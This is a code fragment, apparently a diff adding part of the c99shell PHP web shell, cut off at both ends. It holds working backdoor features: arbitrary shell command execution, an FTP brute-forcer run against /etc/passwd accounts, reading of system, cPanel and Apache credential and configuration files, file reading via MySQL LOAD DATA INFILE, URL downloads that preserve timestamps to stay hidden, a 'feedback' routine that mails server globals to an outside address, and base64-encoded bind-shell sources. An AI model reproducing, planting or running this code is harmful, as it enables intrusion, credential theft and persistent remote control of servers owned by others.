    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = false; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));} + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = false;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $tmp = posix_getpwuid(fileowner($d)); + if ($tmp["name"] == "") {echo fileowner($d)."/";} + else {echo $tmp["name"]."/";} + $tmp = posix_getgrgid(filegroup($d)); + if ($tmp["name"] == "") {echo filegroup($d);} + else {echo $tmp["name"];} + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); exit;} +if ($act == "security") +{ + echo "
    Server security information:
    Software: ".PHP_OS.", ".$SERVER_SOFTWARE."
    Safe-Mode: ".$hsafemode."
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "feedback") +{ + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail("support"."@ccteam.ru","c99shell v.".$shver." feedback #".$ticket,$body,"FROM: c99shell@ccteam.ru"); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (support[at]ccteam[dot]ru):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    No checking in this form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = "ls"; + } + } + echo "
    + +Search for (file/directory name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." directories, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $perms = fileperms($d.$f); + if (!$perms) {echo "Change mode with error: can't get current mode.";} + elseif ($submit) + { + if (!isset($owner[0])) {$owner[0] = 0;} + if (!isset($owner[1])) {$owner[1] = 0; } + if (!isset($owner[2])) {$owner[2] = 0;} + if (!isset($group[0])) {$group[0] = 0;} + if (!isset($group[1])) {$group[1] = 0;} + if (!isset($group[2])) {$group[2] = 0;} + if (!isset($world[0])) {$world[0] = 0;} + if (!isset($world[1])) {$world[1] = 0;} + if (!isset($world[2])) {$world[2] = 0;} + $sum_owner = $owner[0] + $owner[1] + $owner[2]; + $sum_group = $group[0] + $group[1] + $group[2]; + $sum_world = $world[0] + $world[1] + $world[2]; + $sum_chmod = "0".$sum_owner.$sum_group.$sum_world; + $ret = @chmod($d.$f, $sum_chmod); + if ($ret) {$act = "ls";} + else {echo "Changing file-mode (".$d.$f."): error
    ";} + } + else + { + $perms = fileperms($d.$f); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".$perms.")
    "; + $perms = view_perms($perms); + $length = strlen($perms); + $owner_r = $owner_w = $owner_x = + $group_r = $group_w = $group_x = + $world_r = $world_w = $world_x = ""; + if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";} + if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";} + if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";} + if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";} + if ($perms[9] == "x") {$world_x = " checked";} + echo "
    + + +
    + +
    Owner

    + Read
     Write
    + Execute
    Group

    + Read
    + Write
    + Execute
    World

     Read
    + Write
    + Execute
    "; + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1,1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile[tmp_name])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "ps_aux";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== false) {$list[] = $d.$o;} + closedir($h); + } + } + if (count($list) == 0) {echo "
    Can't open directory (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["dirs"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = @posix_getpwuid(fileowner($v)); + $gr = @posix_getgrgid(filegroup($v)); + $row[] = $ow["name"]."/".$gr["name"]; + $row[] = fileowner($v)."/".filegroup($v); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["dirs"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $k = $sort[0]; + if (!is_numeric($k)) {$k = $sort[0] = 0;} + if ($sort[1] != "a") {$sort[1] = "d";} + $y = ""; + $y .= "\"".($sort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $sort[0]; + usort($objects["dirs"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($sort[1] == "d") + { + $objects["dirs"] = array_reverse($objects[dirs]); + $objects["files"] = array_reverse($objects[files]); + } + $objects = array_merge($objects["head"],$objects["dirs"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["dirs"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command"; exit;} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if (is_dir($v)) {$row[] = "\"Info\" ";} + else {$row[] = "\"Info\" \"Change\" \"Download\" ";} + if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["dirs"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + } + } + //Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["dirs"],$tab["links"],$tab["files"]); + echo "
    Listing directory (".count($tab["files"])." files and ".(count($tab["dirs"])+count($tab["links"]))." directories):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "bind") +{ + $bndsrcs = array( +"c99sh_bindport.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW". +"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI". +"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS". +"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp". +"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph". +"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl". +"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy". +"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K". +"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K". +"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9", +"c99sh_bindport.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5". +"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N". +"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy". +"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1". +"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f". +"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p". +"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm". +"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi". +"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl". +"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h". +"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN". 